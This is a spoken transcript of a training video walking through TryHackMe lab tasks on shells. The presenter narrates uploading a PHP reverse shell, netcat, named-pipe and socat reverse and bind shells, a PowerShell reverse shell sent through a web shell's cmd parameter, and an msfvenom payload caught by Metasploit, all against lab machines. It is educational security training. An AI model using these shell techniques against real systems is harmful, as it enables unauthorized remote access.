Yo, what's going on, guys? Welcome back. We are doing What the Shell, but today we're doing just the practice and examples because I left them out before because I wanted people to practice, and I also wanted um, to not make the video 4 hours long or whatever it would have been, probably like 2 hours. But anyway, if you guys want to see these, if you guys like the examples and actually seeing them, even though they're not asking you to answer anything, go ahead and hit that sub button, hit that like button. It helps out way more than you guys know. We are so close to 3K. I really want to reach 5K this year, so that's my goal. Hopefully, you guys can make that happen. I really appreciate everything you guys do for me. So, before we get started, there was a couple of. Normally, I don't go back and redo videos. Usually, the only time I've done or I would do it would be if, basically, if like the box changes or something like that. But because I had enough requests in the comments to redo this one, I want to make sure that we redo it. But the other thing is, for some reason, some of you guys thought that I can't do these, which was very odd to me. Because I literally spent the entire video explaining them. And when I say that, a lot of people said, um, basically, this is the hard part of the box, and I would 100% disagree with you. I think this is the easy part. I think the hard part is actually fully truly understanding what you're doing. So if you think this is the hard part, maybe you should go back and kind of reevaluate where your knowledge is, because this part should be easy. It should be understanding it's the hard part. That's what should take the time and the effort. So just want to clarify that the knowledge is more important than the commands, and that's true across the board with cybersecurity. The knowledge is more important than memorizing a command. Okay, so first things first, what we're going to do, we're going to upload a web shell. Go ahead and start the Linux machine. We're going to need to upload a web shell to the Linux box, then use the command netcat, okay, to send a reverse shell. Now, here's the thing. The next one, they're saying the exact same thing, but they're giving you a specific one to use. We're just going to do both those in one because they do the same thing. So if that makes sense to you guys. So what they're saying here is they're saying go to here, user web shells. Now, the reason you can see I'm already there in the directory. Now, the reason, again, I'm going to do both these at the same time is because they're going to be the exact same process. They're the exact same thing. The only difference is you would use a different web shell. This web shell works just fine. There's no reason to go get a different one just to do the first question. So what we're going to do once this starts up here, and you notice how it's not starting up? I've had that issue twice now. So let's try and refresh it, where I go to start it and I have to go refresh it and restart the machine. Okay, there it says starting the machine. So let's see. Okay, so now it'll actually pop up. So first things first, on the box here, you're going to see if you go to user, share, web shells, PHP, you're going to get this one, PHP reverse shell, okay? So I went ahead and I did that, but I saved it into my desktop. And the reason I always recommend saving it is so that you have the original there in case you edit any of the code or you mess with it or whatever. So you can see here's my PHP reverse shell. And this one is the one, let's see, if we go up here, yep, this is the one that's saved to my desktop. So as you see it, whoops, there you go. You can see they specifically tell you what you need to change. You need to change the port and you need to change the IP. Now, I'm not going to change the port. I'm just going to leave port 1234 because I have no problem with it. But in a real scenario, you would not use port 1234 because it would be pretty obvious. You would want to try and blend in with the environment a little bit. But what we're going to do here is we're going to go ahead and change the IP to whatever IP we get up here. All right, so we got 10, whoops. Or let's see, yep, 10, 10, 240, 14. Or I'm changing that to the wrong one. We'll say 10, 10, 248. 95. So we want this to reach out to our box. I apologize because we're uploading this. So we'll go ahead and save that. Now let's see if I shouldn't have to save it, but let's check something here. And the reason I shouldn't have to save it, I'll show you. All right, is because if we open this, doesn't matter what you open it with. I already did this earlier, and it should, yep, so there it is, 248.95. Okay, so what it is this reverse shell, or this web shell, excuse me, we're going to use our IP because we're going to connect back to our machine. So we're just going to set up netcat. Now you can set up whatever you want. You don't have to set up netcat here because I'm going to show you both of them. But so we're going to use these options, and if you remember, it's connecting on port 1234. So we're going to go ahead and hit enter and let that listen. So that's going to sit there and listen. Now we're going to go to the actual website, and all this website does is, from my understanding, is allow you to upload a web shell. I haven't actually done any reconnaissance on this website. Okay, and it switched to HTTPS for some reason. And I keep doing that. I keep putting an extra one in there. I must be pushing it pretty fast. Okay, so now you can see all we got to do is browse, go to our desktop. There's our PHP reverse shell. So now it's there. Now you just have to submit it. Now there's a couple things you can do. It shows you right where it's at. You can just type that in, or you can just go to uploads, and then it's right here, PHP reverse shell. So now we'll go ahead and look at this before we hit submit. You can see we're listening. If we hit that reverse shell, it's actually loaded it, and you can see now we have a reverse shell. We're in, but you can see we're in bin shell. Nothing wrong with that. But what it's asking us to do is actually change it to bin bash. So you notice this is the same one. They're telling us to sub netcat listener, upload and activate the shell. We did the exact same thing here. We uploaded it as a web shell. So we're knocking out 2 for 1 because there's no point. But we are going to switch over to bin bash versus bin shell. So that way we can do the first one as well. So what we're going to do is we're going to say, we're going to have to set up another listener here. And we're going to say, and we'll just do 2222. Doesn't really matter what port you do. And that's listening. So now here we're going to say, okay, and now you notice we're actually on the machine, and we're switching over to a bin bash shell. And so we're going to say netcat and 10.10.248.95, and port was 2222. And we're just going to say E for execute bin bash. Okay, so now when we hit enter, it's going to give us a bin bash shell, and you can see connection received. So now if I say who am I, we're www data, and we are in bin bash. So now we actually did both those. We have a bash shell on the machine now. So all we did was upload it. Once you upload it, there you go. You can see we uploaded a reverse shell. We got the reverse shell, and then we went ahead from the reverse shell and we connected to a different listener on our machine. So we actually technically have 2 shells here, but we knocked both these out. So now we'll go ahead and close those out, clear them out. So that was the first 2. And we'll say log into the Linux machine over SSH using the credentials, using the technique in task 8 to experiment with bind and reverse netcat shells. So they want us to just log into it. So we'll say SSH shell at 10.240.14. Yes, and then the password was try hack me. Oop, must have typed it wrong. Okay, we're in. So now you can see we're at the box is called shell practice, so we're in the shell practice. All right, so practice reverse and bind shells using SOCAT on. Did I skip one? Yep. Okay. Log into the machine over SSH using the credentials. Give me one sec. I'm just trying to adjust the light here so that way you guys don't have any issues. All right. So sometimes if the light gets messed up on this side, it like starts, this part of the screen will get all blurry, so it gets messed up. So now log into the Linux machine. Now what they're saying here is they're being very vague. So when I say that, they're saying log into the Linux machine over SSH using the techniques in task 8. Just experiment. They're not telling you exactly what to do. They're just saying experiment. Okay. So really all they're saying here is do whatever of these tasks you want. So keep that in mind. Okay. So you can see here, that a previous task mentioned, blah, blah, blah. And they're showing you the netcat listener the exact same way that we just did it. So technically, if you wanted to, you could just do that, and you've done what they've asked. You've experimented on what these are. So connecting to the above listener with netcat would result in a bind shell on the target, which is what we just did. We had that bind shell. Okay, so however, this is not included in most versions of netcat. So what they're saying is only newer versions of netcat have these. So if your machine has an outdated version or it's not updated or whatever, it won't have it. So as it's widely seen to be very insecure, valid, right? On Windows, where static binary is always required anyway, this technique will work perfectly. On Linux, however, we would instead use this code to create a listener for a bind shell. So all this is you're making a name pipe. You're temporarily naming it. And then you can see there, we'll go ahead and just copy this. So, so you can see here, they're walking you through it. The command first creates a name pipe at temp F, which is what we said, then starts the netcat listener like normal. And then all it's doing is directing it to the name pipe. So it's saying basically right here to the output of the name pipe. So whatever comes for the name pipe, it's going into netcat. This is very similar to how you would create a similar to a pivot scenario if you're using netcat. And then you can see you've got to have it piped to bin shell and going back to the pipe. So you've got to have two-way street here. And then at the end, they remove it. Now, if you didn't remove it, it would just be a lot of data, right? Just being kind of pointlessly thrown about. So you can see here, who am I? That's Murray. And then here, who am I? That's Shell. And then he goes ahead and does the name pipe, and then he's connecting to it. So you can see if we go here, and it doesn't matter which way you do it. We'll go ahead. I got to freaking copy and paste it. Okay, and then you got to click here. I don't want to type the whole thing out. Okay, so you can see here, if we go ahead and do this, we've got to change some stuff on it. We can't just leave the port empty. We'll just name the port whatever we want. Make sure you take the little brackets out, because if you don't, we will end up with confusion, because those tell data which way to flow, so it would mess up. So we'll go ahead and hit this, and you can see that with L right there, you see netcat L. That means it's listening. So that's the listener. Keep that in mind. If you ever see netcat tac L, that means it's listening. So we hit enter. Now it's listening. So now we can go here and we can say, okay, we're on netcat, or we need to connect with netcat. So now we say netcat, and we have the actual listener, and the IP is 10.10.240.14. So all of these are pretty simple. You have a listener and you have a connection. Talk to each other and you're set. Okay, so we have the IP, and then once we have the IP, we just tell it what port, which was 1234, I believe we did again, and you hit enter, and you can see we are connected. So here's another thing. I keep seeing everybody messing this up and being confused. Just because it's blinking like this does not mean you're not connected. The other thing is when you hit LS, because this is one of the first things a lot of people do, they say, well, I get no response, so I'm not in. It doesn't matter. You are in. You see, I'm shell now. I'm not root on my machine. I'm shell. You are in the directory you connect to directly from the shell practice box doesn't have anything in the directory. So if I CD back and hit LS, now I have something in the directory. You can see I'm on the machine. I have a shell on the machine using the pipe method. The difference is you just didn't see it. Okay, you're going to see the same thing with the SOCAT one that we're getting ready to do. So give me 1 second. I'm going to fix this. All right. Okay. So now, hopefully that makes sense to you guys. The pipe thing, I'm not going to dive deep into because I've already spoke about it on the knowledge method. So if you guys are not for sure what I'm doing or don't fully understand what's going on, just go back to my other video where I actually explain everything. This is why I'm doing it in 2 videos, so that way people that just want to see it can come here and see it, and then people that actually want the knowledge can do the knowledge check. So My dog's is making noise upstairs. Okay, so now practice reverse shells using SOCAT. Okay, so now we'll go ahead and we'll go ahead and Control C out of that. Okay, so you see we're still shell. We're still on the machine. So that's good. That's fine. We want to stay on the machine. Okay, so now we're on the machine. We say, who am I, just to make sure, even though we can see it right there. And you can see, boom. Okay, so now we have the machine. We're SSH'd in, which is what we need to do. And then we need to use reverse and bind shells using SOCAT. So now we just go up to here to SOCAT. And you can see SOCAT's very similar, very easy to do. All you're going to do on Windows, well, we're not doing the Windows right now. So this is the equivalent command for Linux. So you just go here and you just say whatever port you want. Doesn't really matter. If I can get the dang thing to go all the way, there we go. My goodness. Okay, so now all we're going to do is we're going to say here, get that back. Okay, we're going to change the local port. So keep in mind, both machines have to have SOCAT on them. This machine does. Okay, so SOCAT, local, I think it said local IP. What did it say? Okay, yeah, local IP. So this was 10.10.248.95. And then the port. And the port we want to do, we'll just stick with 1234 because it's simple. 1234, right? And then that will execute bash, but we have to have our listener set up. So here you can see we have to have our listener, and you can see right here they have it set, the listener set up for you. And I'm not even going to copy that, it's small enough. Okay, SOCAT, and then TCP, TAC L for listen, and then the port, which is 1234. So we're listening. Now here we execute. Okay, welcome back. So two things happened there. One, I was connected, but it was unstable, so I had to get rid of the connections. But what happened, basically, after all this, you see all these extra commands, is my machine was still registering that port 1234 was still in use because we've used it previously. It wasn't shut down all the way yet, so I had to change the port to 2345. So if you run into that where you're doing it too fast, basically what's happening is your port is still in use. So I had to change the port to 2345. So anyway, so you can see here, same command. We did everything the exact same. So SOCAT, TCP 10.10.248.95, but we did 2345 and then execute bash. And then here, all we did was the SOCAT TCP listener 2345. And then you can see from here, it's blinking. Remember, when it's blinking, it doesn't mean that we're not connected. Okay. So we say, who am I? And you can see I'm root on my machine. So who am I? I'm shell. And then you can see the nice thing here is it actually runs the commands here. So this is how you can tell if it's working with SOCAT, okay? Because some people get confused. You can tell it's working because of this. The commands are being ran directly on the machine, not back on your machine and where you can't see them, okay? So now we're looking at bind shells. It said to do bind shells was the next one. And this is basically the same thing, so there's no real reason to do the reverse shell versus the bind shell. I'm not even going to do it because literally it's the exact same thing. The only difference is where it's coming from. So a reverse shell comes from the target machine and comes back and connects to you. The bind shell is you're directly connecting. So you're starting a listener on the machine, and then so you would see here, you would just go ahead and start that listener on the Linux machine, and then here you would connect to it. It's the same thing, just reverse. I'm not going to cover that one. If you guys think it's because I can't do it, that's fine. I don't care. So now let's see. Switch to the Windows VM. Okay, so now we need to go ahead and close this down, terminate that, and now we're going to do the same thing on Windows. Okay, welcome back. Hopefully that's the last time I have to restart the machines or do any of that because it's driving me nuts that TryHackMe's being finicky. So what I mean by that is I keep having to freaking click or refresh the page to get it to connect, and it's just driving me nuts. So hopefully you guys are still with me. We're on, which one are we even on? We're on Windows. Yeah, try and obtain a reverse shell using PowerShell. So, perfect, pretty easy. You just go to, where were we, 11 web shells. So, it walks you right through it. So, you're going to take this here, PHP echo. So, this is just the reverse shell that they want you to upload. Okay, we've already uploaded it. It's called untitled.php. Pretty simple. You can see it saved there as untitled. All it's going to do is it's going to execute whatever we put after CMD, after command. And you can see that right here. You can see they do CMD equals ifconfig, and this is the results they get back. Well, now what we want to do is we want to tell it to connect back. So we're going to use this command, PowerShell. It's a reverse shell with PowerShell. It's the same thing that they walked through earlier. The only difference is the URL encoded it, which means it will run in the URL and we don't have to worry about it. So we go ahead and copy it. So now we just call to it. So we say uploads untitled.php, and then we say cmd equals, and we hit Control V. Now let's make sure we got our reverse shell listener. Okay, so it's listening. Now we hit enter, and you can see connection from blank received. So now we hit ls, and we're in a PowerShell command, or in a PowerShell prompt, which is obviously we're on a Linux box. So if we're in a PowerShell prompt, we know that we're connected. We know something happened. Okay, so the web server is running with system privileges. Create a new user. I'm not going to do that just because that's got nothing to do with reverse shells. They just want you to understand how to create a new user, add it to the admin group. That's more persistence. You guys can walk through that. It's super simple. I think they even walk you through it. I think it's under next steps. Yeah. So net user, net. I'm not going to do that. It's a waste of time. It takes you guys 10 minutes max. And then experiment using SOCAT and netcat to obtain reverse shell and bind shells on Windows targets. So again, it's the same thing over and over. Create a 64-bit Windows interpreter shell using MSF Venom. That's again pretty self-explanatory. You're going to use MSF Venom to actually generate the payload and do that. Create both staged and stageless interpreter shells. So again, these are just repeating over and over and over. The MSF Venom one, it's pretty self-explanatory here. They give you the actual command. Apparently, I didn't realize they give you the full command. So we'll go ahead and copy. We'll do the MSF Venom one, but that's probably the last one I'm going to do because these are just the same things repeated. I think you guys get the gist. I think you guys understand it. So we'll go ahead and close that because we'll probably have to open it up here again. But so we'll go ahead and copy. Okay. Now we can just go ahead and literally put that in. Listening port, we'll change to 1234 again. 1234, and then the host, listening host, that's us. 10.10.248.95, and we hit enter, and that's going to take a second, and it'll run. Okay, and the SOCAT and netcat, it's just telling you to experiment with them. So keep in mind, what it's telling you is just try out the different ways. SOCAT and netcat are very similar. That's the only reason I'm not going to do them because we've already covered SOCAT earlier, and it's basically the exact same thing with a different syntax. Okay, so then create 64-bit Windows interpreter shell using MS, upload it to the Windows target, activate the shell, and catch it. So we have to open up MSF console. That might take a second. But if we go in here, shell.exe is what they named it. Perfect. Now we just got to upload that. And you can see they gave you the command. So MSF Venom gave it to us. It's pretty easy. And we just say 10.10.58.54. And we upload. Now keep in mind I have it actually sitting at user share web shells. And that's just the directory I was in when I created that. PHP. And there's shell.exe. So we go ahead and upload that. It's uploaded. Now, it's not going to capture it until we say use multi-handler. And we'll see if it actually figured it out. Okay. And the reverse. All right. Let's see what we have to. And the L host that is required, the listening address. So we'll say set L host to ton 0, I believe. 10.0 is not valid option. Okay, so we'll just set it to the IP that we know it is. 10.10.248.95. So we set that, and that should be all we need. Oh, and the set L port, which we set to 1234, and we should be good. Now we run it, and it should be listening. Okay, so it's listening. So now we just say uploads shell.exe, hit enter. Okay, so maybe it was upload. Oh, I never uploaded it. I guess you got to do that, huh? So we run it. I'm not going to do that. I'm just going to go to uploads shell.exe. Again, I don't really care what they do with it. Oh, they want us to log into the activate the shell, experiment with the feature. So they want us to actually log into the machine and go to it and download it and show you what it looks like. So we'll do that real quick. Whoops. Just to show you guys. All right, so we're going to go ahead and do this. Copy it. So if you don't know what's going on here, all that's happening is we created an MSF Venom executable on a Windows machine. We'll go ahead and log in. Do you trust the cert? Yes. Should log us automatically in. So we created the MSF Venom payload. Now we just have to go to the website, get it to run on the machine, and boom, we're literally in with a full interpreter shell. That's what's scary. And there's multiple. The other thing to keep in mind is there's multiple ways to do all of these. And what I mean by that is you could go look up 50 different web shells right now that are different than the ones we used. You could look up all kinds of stuff. So don't think that just because that's how we did it, that's how it's asking you to do it, whatever. That's the whole point of these labs, is they want you to experiment. They don't want you to just literally do exactly what they say. So and then staged and stageless interpreter shells for either target. That's, again, they're just wanting you to experiment at that point. They're just saying, okay, go to either target, start throwing stuff at a wall and see what sticks. But I want to get you at least the ones that they're specifically asking for certain things. And yes, this is going to be slow because it's a VM inside of a VM. And yeah, so. Okay. So since it should be hosted on this machine, we should be able to just do 127.0.0.1. All right, and we already know uploads shell.exe. What would you like to do? We'll save the file. Go to downloads. Show all downloads. And once it's done, I don't know how it has. There we go. Once it's done, we'll go ahead and execute it. So it's already done. We go to downloads, shell.exe. We run it. And you can see as soon as we run it, we have, if it runs, run it, and you can see we have an interpreter session. So command shell session 1, so ls, whatever you want to say, sessions. It's already interactive, okay. Okay. So we have the session, but for some reason it's it's saying it's already interactive, that I'm already in it, but I'm clearly not. Let's Control Z and background it. Okay, so now go to sessions. So we have the one sessions interact with one. Oh, I had a little too many in there. Starting interaction with one. So and you can see it's actually not doing anything, but we have the session. So it worked, but for some reason, Meterpreter's not doing what it's supposed to do, and we're not getting the full session. Normally what I'd do here is I would just do it again, but I'm not going to do it again because you guys saw it. The connection worked. You saw that I have interaction with one. And you can see, yeah, so it's showing the two IPs, the connection, everything. So it worked. Everything's fine. I would just rerun it again if it didn't work correctly. So, but that's how you do it. You saw how to actually get the use the Meterpreter and the MSF Venom to create the Meterpreter shell. I could have actually grabbed the wrong Meterpreter too, and I'll show our MSF Venom. So let me look. Windows. Oh yeah, see, I grabbed the wrong one. So that's on me. I grabbed the Windows shell, not the Meterpreter shell. And let's see if they show us that. Yeah, so here's the Windows Meterpreter reverse TCP. So I just grabbed the wrong one because I was trying to hurry. So that's what happened. So that's why it wasn't making sense with itself. So keep that in mind. That's what happened. I just grabbed the wrong one. It still captured the connection. It just didn't know what to do with it. So that's it, guys. Hopefully that explained a lot to you guys to see the physical ones. Like I said, the staged and stageless, they're just having you experiment. They're telling you to try the different ones. Experiment with SoCat. Again, they're just having you, we already covered NetCat's the exact same thing. So hopefully this makes sense to you guys. Hopefully you guys can now see these things go in order. I know this was kind of all over the place, and the main reason for that is because TryHackMe just for some reason is messing up today. It's driving me nuts. Literally, I have to keep refreshing the page just to get one of these things to freaking start. So hopefully that makes sense to you guys, and hopefully this helps you guys, because I know a lot of people were having issues with the reverse shells. The one thing I will tell you with reverse shells is this is not a step-by-step guide, okay? Every single web application and things like that have different ways of doing reverse shells. Some might allow you to upload PHPs, some might not. Some might, let you do remote code execution in the command line or in the URL parameters like we saw. Some might not. So it's trial and error, it's experimentation. Just understand how a shell, reverse and bind shell works and what the difference is, okay? That's it, guys. Hope you guys have a great day, and thanks for watching.